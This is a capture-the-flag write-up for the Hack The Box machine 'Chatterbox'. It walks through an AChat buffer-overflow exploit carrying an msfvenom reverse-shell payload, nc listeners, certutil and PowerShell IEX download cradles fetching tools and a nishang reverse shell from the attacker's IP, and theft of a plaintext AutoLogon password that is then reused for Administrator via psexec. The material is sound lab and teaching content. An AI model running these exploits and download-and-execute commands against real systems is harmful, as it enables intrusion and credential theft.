Chatterbox

From Luniwiki

Chatterbox01.png

Port scan

u505@naos:~/HTB/Machines/Chatterbox$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.74

Starting masscan 1.0.5 at 2021-01-14 17:03:29 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 9255/tcp on 10.10.10.74
Discovered open port 9256/tcp on 10.10.10.74
u505@naos:~/HTB/Machines/Chatterbox$ nmap -sC -sV chatterbox
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-14 12:03 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.40 seconds
u505@naos:~/HTB/Machines/Chatterbox$ nmap -Pn -sC -sV chatterbox
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-14 12:03 EST
Nmap scan report for chatterbox (10.10.10.74)
Host is up.
All 1000 scanned ports on chatterbox (10.10.10.74) are filtered

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.74 seconds
u505@naos:~/HTB/Machines/Chatterbox$ nmap -Pn -p 9255,9256 -sC -sV chatterbox
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-14 12:07 EST
Nmap scan report for chatterbox (10.10.10.74)
Host is up (0.043s latency).

PORT     STATE SERVICE VERSION
9255/tcp open  http    AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open  achat   AChat chat system

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.70 seconds

Achat buffer overflow

u505@naos:~/HTB/Machines/Chatterbox$ searchsploit achat
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow    | windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (M | windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Sc | php/webapps/32958.txt
Parachat 5.5 - Directory Traversal            | php/webapps/24647.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
u505@naos:~/HTB/Machines/Chatterbox$ searchsploit -m 36025
  Exploit: Achat 0.150 beta7 - Remote Buffer Overflow
      URL: https://www.exploit-db.com/exploits/36025
     Path: /usr/share/exploitdb/exploits/windows/remote/36025.py
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Chatterbox/36025.py

Installing and running Achat v0.150 beta7 on a Windows 10 test box shows it listening on TCP 9255, TCP 9256 and UDP 9256, the same ports found on the target.

Test the PoC on the Windows 10 box

Chatterbox02.png

C:\Users\u505>tasklist /v  | findStr AChat
chrome.exe                    2916 RDP-Tcp#1                  3    141,960 K Running         WINDOWS10\u505                                          0:00:14 AChat download | SourceForge.net - Google Chrome
AChat.exe                     2784 RDP-Tcp#1                  3     23,496 K Running         WINDOWS10\u505                                          0:00:01 AChat v0.150 beta7

C:\Users\u505>netstat -ano | findStr 2784
  TCP    192.168.76.21:9255     0.0.0.0:0              LISTENING       2784
  TCP    192.168.76.21:9256     0.0.0.0:0              LISTENING       2784
  UDP    192.168.76.21:9256     *:*                                    2784

First attempt at the buffer overflow, with the stock PoC (calc.exe payload).

u505@naos:~/HTB/Machines/Chatterbox$ cp 36025.py testw10_calc.py
u505@naos:~/HTB/Machines/Chatterbox$ diff testw10_calc.py 36025.py
57c57
< server_address = ('192.168.1.21', 9256)
---
> server_address = ('192.168.91.130', 9256)
78c78
< sock.close()
---
> sock.close()
\ No newline at end of file

Run the PoC after changing only the target IP.

u505@naos:~/HTB/Machines/Chatterbox$ python testw10_calc.py
---->{P00F}!

After the payload is sent, the chat window fills with Z characters (the 114688-byte filler), AChat crashes and a calculator pops up: the overflow works against this build of the program.

Chatterbox03.png

Test reverse shell on Windows 10

Generate a windows/shell_reverse_tcp payload with msfvenom to replace the calc.exe payload, keeping the encoder, bad-character list and BufferRegister of the original exploit.

u505@naos:~/HTB/Machines/Chatterbox$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.1.30 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3767 bytes
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
...

Modification of the Python script (diff against the original):

u505@naos:~/HTB/Machines/Chatterbox$ diff testw10_rev.py 36025.py
54,122d53
< #u505@naos:~/HTB/Machines/Chatterbox$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.1.30 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
< #Found 1 compatible encoders
< #Attempting to encode payload with 1 iterations of x86/unicode_mixed
< #x86/unicode_mixed succeeded with size 774 (iteration=0)
< #x86/unicode_mixed chosen with final size 774
< #Payload size: 774 bytes
< #Final size of python file: 3767 bytes
< buf =  b""
< buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
...
< buf += b"\x53\x69\x6f\x39\x45\x41\x41"
<
126c57
< server_address = ('192.168.1.21', 9256)
---
> server_address = ('192.168.91.130', 9256)
147c78
< sock.close()
---
> sock.close()
\ No newline at end of file

The encoded payload is 774 bytes, within the 1152 bytes the exploit reserves for shellcode (the script pads the remainder with A so the packet layout is unchanged). The script is Python 2, hence the print statement and the str concatenation with the b"" buffer.

u505@naos:~/HTB/Machines/Chatterbox$ tail -n 25 testw10_rev.py

# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('192.168.1.21', 9256)

fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))    # buf: the msfvenom payload pasted above
p += "\x00" + "A"*10 + "\x00"

print "---->{P00F}!"
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent

sock.close()
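Before pasting the msfvenom output into the script, it is worth checking it against the constraints the script silently relies on. The Python 3 below is an added example, not part of the original exploit or of this write-up: the bad-character set and the 1152-byte space come from the msfvenom command and the p += buf + "A" * (1152 - len(buf)) line above, and the sample bytes are the start of the encoded payload shown earlier plus a constructed broken variant. The script itself never checks the length: an oversized buf turns "A" * (negative) into an empty string and shifts everything after it.

```python
# Added example (not part of the original page or of the 36025.py exploit):
# sanity-check an msfvenom-encoded payload against the constraints that
# 36025.py imposes before pasting it into the script.

# Bad characters passed to msfvenom on this page: NUL and every byte >= 0x80.
BAD_CHARS = frozenset([0x00] + list(range(0x80, 0x100)))

# Bytes the exploit reserves for shellcode: p += buf + "A" * (1152 - len(buf))
SHELLCODE_SPACE = 1152

# Sender parameters from the script's loop: 8192-byte datagrams, with a
# one-second pause per datagram once more than 172000 bytes have gone out.
CHUNK = 8192
SLOW_AFTER = 172000


def check_shellcode(buf, bad_chars=BAD_CHARS, space=SHELLCODE_SPACE):
    """Return a list of problems; an empty list means the buffer is usable."""
    problems = []
    offending = sorted({b for b in buf if b in bad_chars})
    if offending:
        problems.append("bad characters present: "
                        + ", ".join("0x%02x" % b for b in offending))
    if len(buf) > space:
        problems.append("payload is %d bytes, only %d available" % (len(buf), space))
    return problems


def pad_shellcode(buf, space=SHELLCODE_SPACE, filler=b"A"):
    """Pad the way the exploit does, but refuse an oversized payload instead of
    silently emitting an empty (negative-count) filler like the script would."""
    problems = check_shellcode(buf, space=space)
    if problems:
        raise ValueError("; ".join(problems))
    return buf + filler * (space - len(buf))


def send_plan(total, chunk=CHUNK, slow_after=SLOW_AFTER):
    """Mirror the script's send loop without a socket: return the number of
    datagrams and how many of them are delayed by the sleep."""
    datagrams = throttled = 0
    i = 0
    while i < total:
        if i > slow_after:
            throttled += 1
        datagrams += 1
        i += min(chunk, total - i)
    return datagrams, throttled


# Constructed samples: the first bytes of the unicode_mixed payload shown on
# this page (a full payload is 774 bytes) and a deliberately broken variant.
SAMPLE_OK = b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
SAMPLE_BAD = b"\x50\x50\x59\x00\xe8\x41"

if __name__ == "__main__":
    print(check_shellcode(SAMPLE_OK))        # []
    print(check_shellcode(SAMPLE_BAD))       # ['bad characters present: 0x00, 0xe8']
    print(len(pad_shellcode(SAMPLE_OK)))     # 1152
    print(send_plan(180000))                 # (22, 1)
```

NUL and 0x80-0xff are rejected because the original exploit's msfvenom line excludes them and relies on the Unicode-safe x86/unicode_mixed encoder with BufferRegister=EAX; check_shellcode is a cheap way to catch a payload that was regenerated without the -b list or with a different encoder.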

Start a listener.

u505@naos:~/HTB/Machines/Chatterbox$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Run the exploit.

u505@naos:~/HTB/Machines/Chatterbox$ python testw10_rev.py
---->{P00F}!

The reverse shell is opened.

u505@naos:~/HTB/Machines/Chatterbox$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.1.21.
Ncat: Connection from 192.168.1.21:58472.
Microsoft Windows [Version 10.0.19042.685]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
windows10\u505

Again, the exploit crashes the chat program once the shellcode runs. That is expected for an overflow of this kind, but it makes the exploit single-shot: if the payload fails, the service is gone until AChat is restarted, so the listener and payload must be right before the first attempt against the target.

Exploit the target

For the real target, regenerate the msfvenom payload with the HTB VPN address (LHOST=10.10.14.7) and set server_address to 10.10.10.74; the rest of the script is unchanged.

u505@naos:~/HTB/Machines/Chatterbox$ grep 10.10 buf_achat.py
#u505@naos:~/HTB/Machines/Chatterbox$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.7 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
server_address = ('10.10.10.74', 9256)

Start a listener.

u505@naos:~/HTB/Machines/Chatterbox$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

And run the exploit.

u505@naos:~/HTB/Machines/Chatterbox$ python buf_achat.py
---->{P00F}!

The reverse shell opens, as the user alfred on a Windows 7 host.

u505@naos:~/HTB/Machines/Chatterbox$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.74.
Ncat: Connection from 10.10.10.74:49191.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\alfred

User flag

C:\Windows\system32>cd c:\Users\alfred\desktop
cd c:\Users\alfred\desktop

c:\Users\Alfred\Desktop>type user.txt
type user.txt
<USER_FLAG>

Privilege escalation

It is Windows 7 Professional SP1 (6.1.7601) and heavily patched: 183 hotfixes, the newest being KB4054518. A kernel exploit is therefore not the obvious route; misconfiguration is worth checking first.

c:\Users\Alfred\Desktop>systeminfo
systeminfo

Host Name:                 CHATTERBOX
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00371-222-9819843-86663
Original Install Date:     12/10/2017, 9:18:19 AM
System Boot Time:          1/14/2021, 12:00:46 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,541 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,436 MB
Virtual Memory: In Use:    659 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\CHATTERBOX
Hotfix(s):                 183 Hotfix(s) Installed.
                           [01]: KB2849697
                           [02]: KB2849696
                           ...
                           [183]: KB4054518
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.74

winPEAS

Serve the winPEAS executable over HTTP from our box.

u505@naos:~/HTB/Machines/Chatterbox$ mkdir web
u505@naos:~/HTB/Machines/Chatterbox$ cd web
u505@naos:~/HTB/Machines/Chatterbox/web$ cp /opt/utils/privilege-escalation-awesome-scripts-suite/winPEAS/./winPEASexe/winPEAS/bin/x86/Release/winPEAS.exe ./
u505@naos:~/HTB/Machines/Chatterbox/web$ sudo python -m SimpleHTTPServer 80     
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...

Download winPEAS on the target with certutil.

c:\Users\Alfred\Desktop>certutil -urlcache -split -f "http://10.10.14.7/winPEAS.exe" winPEAS.exe
certutil -urlcache -split -f "http://10.10.14.7/winPEAS.exe" winPEAS.exe
****  Online  ****
  000000  ...
  073400
CertUtil: -URLCache command completed successfully.

Run the enumeration.

c:\Users\Alfred\Desktop>winPEAS.exe
winPEAS.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
   Creating Dynamic lists, this could take a while, please wait...
   - Checking if domain...
...
 [+] Looking for AutoLogon credentials
    Some AutoLogon credentials were found!!
    DefaultUserName               :  Alfred
    DefaultPassword               :  Welcome1!
...

winPEAS found Alfred's credentials in the AutoLogon values. Confirm by querying the Winlogon key directly:

c:\Users\Alfred\Desktop>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ
    LegalNoticeText    REG_SZ
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    ShutdownWithoutLogon    REG_SZ    0
    WinStationsDisabled    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    scremoveoption    REG_SZ    0
    ShutdownFlags    REG_DWORD    0x80000033
    DefaultDomainName    REG_SZ
    DefaultUserName    REG_SZ    Alfred
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    Welcome1!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
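As an added example (not part of the original write-up or of winPEAS), the Python below parses reg query output of the kind shown above and flags the AutoLogon credential the way winPEAS did; the sample text is constructed from this page's output. One caveat worth knowing: when AutoAdminLogon is 1 but DefaultPassword is missing, the password is normally stored in the LSA secret DefaultPassword instead, which only SYSTEM can read, so a negative result from this check does not rule AutoLogon out.

```python
# Added example (not from the original page): parse the output of
#   reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# and report a plaintext AutoLogon credential.
import re

# Constructed sample, trimmed from the reg query output on this page.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    DefaultDomainName    REG_SZ
    DefaultUserName    REG_SZ    Alfred
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    Welcome1!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
"""

# A value line is: <indent><name> <REG_TYPE> <data>; data may be empty.
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s*(.*)$")


def parse_reg_query(text):
    """Return {key_path: {value_name: data}} for every key in reg query output.
    Key paths start at column 0; values are indented under their key."""
    keys = {}
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith((" ", "\t")):
            current = line.strip()
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, _type, data = m.groups()
            keys[current][name] = data.strip()
    return keys


def find_autologon(text):
    """Return the AutoLogon credential stored in the Winlogon key, or None.
    'enabled' tells whether AutoAdminLogon is actually switched on; a leftover
    DefaultPassword with AutoAdminLogon=0 is still a credential worth reporting."""
    for path, values in parse_reg_query(text).items():
        if path.endswith("\\Winlogon") and values.get("DefaultPassword"):
            return {
                "domain": values.get("DefaultDomainName", ""),
                "user": values.get("DefaultUserName", ""),
                "password": values["DefaultPassword"],
                "enabled": values.get("AutoAdminLogon") == "1",
            }
    return None


if __name__ == "__main__":
    print(find_autologon(SAMPLE_REG_QUERY))
    # {'domain': '', 'user': 'Alfred', 'password': 'Welcome1!', 'enabled': True}
```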

Shell as administrator

psexec needs SMB (TCP 445), which is filtered from the outside (the earlier nmap scan reported all top-1000 ports filtered). A reverse tunnel from the target back to our box exposes it.

First step: download the Windows chisel binary.

u505@naos:~/HTB/Machines/Chatterbox/web$ wget -q https://github.com/jpillora/chisel/releases/download/v1.7.4/chisel_1.7.4_windows_386.gz
u505@naos:~/HTB/Machines/Chatterbox/web$ gunzip chisel_1.7.4_windows_386.gz

Upload chisel to the target.

c:\Users\Alfred\Desktop>certutil -urlcache -split -f "http://10.10.14.7/chisel_1.7.4_windows_386" chisel.exe
certutil -urlcache -split -f "http://10.10.14.7/chisel_1.7.4_windows_386" chisel.exe
****  Online  ****
 000000  ...
 724e00
CertUtil: -URLCache command completed successfully.

Run the chisel server on our box. The reverse tunnel will bind port 445 locally, a privileged port, so the server runs as root (sudo). Binding a high port instead (for example R:4450:127.0.0.1:445) and pointing the SMB tools at it avoids the root requirement.

u505@naos:~/HTB/Machines/Chatterbox$ wget -q https://github.com/jpillora/chisel/releases/download/v1.7.4/chisel_1.7.4_linux_amd64.gz
u505@naos:~/HTB/Machines/Chatterbox$ gunzip chisel_1.7.4_linux_amd64.gz
u505@naos:~/HTB/Machines/Chatterbox$ chmod +x chisel_1.7.4_linux_amd64
u505@naos:~/HTB/Machines/Chatterbox$ sudo ./chisel_1.7.4_linux_amd64 server --reverse --port 4445
[sudo] password for u505:
2021/01/14 14:33:55 server: Reverse tunnelling enabled
2021/01/14 14:33:55 server: Fingerprint KtsgB5aG+gCbCLsd2GVsizSCQg4gNCYDT0mfdac7R74=
2021/01/14 14:33:55 server: Listening on http://0.0.0.0:4445

Run the chisel client on the target. start /b keeps it in the background so we do not lose the console; R:445:127.0.0.1:445 forwards port 445 on our box to the target's SMB service.

c:\Users\Alfred\Desktop>start /b chisel.exe client 10.10.14.7:4445 R:445:127.0.0.1:445
2021/01/15 01:38:05 client: Connecting to ws://10.10.14.7:4445
2021/01/15 01:38:15 client: Connected (Latency 40.0023ms)

Confirm Alfred's credentials over SMB through the tunnel.

u505@naos:~/HTB/Machines/Chatterbox$ crackmapexec smb 127.0.0.1/32 -u alfred -p 'Welcome1!'
SMB         127.0.0.1       445    CHATTERBOX       [*] Windows 7 Professional 7601 Service Pack 1 (name:CHATTERBOX) (domain:Chatterbox) (signing:False) (SMBv1:True)
SMB         127.0.0.1       445    CHATTERBOX       [+] Chatterbox\alfred:Welcome1!

The Administrator account reuses the same password; (Pwn3d!) means the account has administrative rights on the host.

u505@naos:~/HTB/Machines/Chatterbox$ crackmapexec smb 127.0.0.1/32 -u administrator -p 'Welcome1!'
SMB         127.0.0.1       445    CHATTERBOX       [*] Windows 7 Professional 7601 Service Pack 1 (name:CHATTERBOX) (domain:Chatterbox) (signing:False) (SMBv1:True)
SMB         127.0.0.1       445    CHATTERBOX       [+] Chatterbox\administrator:Welcome1! (Pwn3d!)

psexec through the tunnel gives a shell as SYSTEM.

u505@naos:~/HTB/Machines/Chatterbox$ python3 /opt/utils/impacket/examples/psexec.py administrator@127.0.0.1
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 127.0.0.1.....
[*] Found writable share ADMIN$
[*] Uploading file DCTXVrZo.exe
[*] Opening SVCManager on 127.0.0.1.....
[*] Creating service CMKA on 127.0.0.1.....
[*] Starting service CMKA.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>type c:\users\administrator\desktop\root.txt
b'Access is denied.\r\n'

C:\Users\Administrator\Desktop>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 5
[*] Opening SVCManager on 127.0.0.1.....
[*] Stopping service rbpD.....
[*] Removing service rbpD.....
[*] Removing file tDvADwgE.exe.....

This was unexpected: the shell runs as SYSTEM, yet root.txt cannot be read. The file carries an explicit ACL listing only Administrator (see the icacls output in the alternative section below), and SYSTEM is not in it. SYSTEM could still get at the file by taking ownership (takeown, via SeTakeOwnershipPrivilege), but that alters the file; the cleaner route is a shell that runs as Administrator. We copy the nishang reverse PowerShell.

u505@naos:~/HTB/Machines/Chatterbox/web$ cp /usr/share/windows-resources/nishang/Shells/Invoke-PowerShellTcp.ps1 ./
u505@naos:~/HTB/Machines/Chatterbox/web$ mv Invoke-PowerShellTcp.ps1 RevAdmin4446.ps1

At the end of the script we append the call that opens the reverse shell.

u505@naos:~/HTB/Machines/Chatterbox/web$ vi RevAdmin4446.ps1
u505@naos:~/HTB/Machines/Chatterbox/web$ tail -n 5 RevAdmin4446.ps1
        Write-Error $_
    }
}

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 4446

We create a second script that runs the first one (RevAdmin4446.ps1) as a new PowerShell process under the Administrator credentials.

u505@naos:~/HTB/Machines/Chatterbox/web$ vi cred.ps1
u505@naos:~/HTB/Machines/Chatterbox/web$ cat cred.ps1
$pass = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Administrator',$pass)
start-Process -FilePath "powershell"  -ArgumentList "IEX(New-Object Net.webclient).downloadString('http://10.10.14.7/RevAdmin4446.ps1')" -Credential $cred

Start a listener on port 4446.

u505@naos:~/HTB/Machines/Chatterbox/web$ rlwrap nc -lnvp 4446
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446

Run cred.ps1 from Alfred's shell.

c:\Users\Alfred\Desktop>start /b powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.webclient).downloadString('http://10.10.14.7/cred.ps1')"
start /b powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.webclient).downloadString('http://10.10.14.7/cred.ps1')"

The reverse shell is opened as administrator.

u505@naos:~/HTB/Machines/Chatterbox/web$ rlwrap nc -lnvp 4446
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446
Ncat: Connection from 10.10.10.74.
Ncat: Connection from 10.10.10.74:49169.
Windows PowerShell running as user Administrator on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\Alfred\Desktop> whoami
whoami
chatterbox\administrator
PS C:\Users\Alfred\Desktop> type c:\users\administrator\desktop\root.txt
<ROOT_FLAG>

Alternative: change the rights on root.txt

While trying to change the rights on root.txt as SYSTEM, I noticed that Alfred has rights on the Administrator's Desktop folder. This method reads root.txt, but the box is not owned: there is no administrator shell.

c:\Users\Alfred\Desktop>cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop

Alfred can enter the Desktop folder.

c:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.

But cannot read root.txt.

c:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files

Alfred can list the rights of the file root.txt: only Administrator is granted, and none of the entries carries the (I) flag.

Alfred has full control of the folder and of inheriting objects through inherited ACEs, and so does SYSTEM, yet SYSTEM was denied. The folder permissions are not what decides here: root.txt has its own explicit ACL with no (I) entries, so inheritance from Desktop is disabled and only Administrator is listed. What lets Alfred change the DACL anyway is ownership (dir /q below shows Alfred owns root.txt): the owner of an object always holds READ_CONTROL and WRITE_DAC regardless of the DACL.

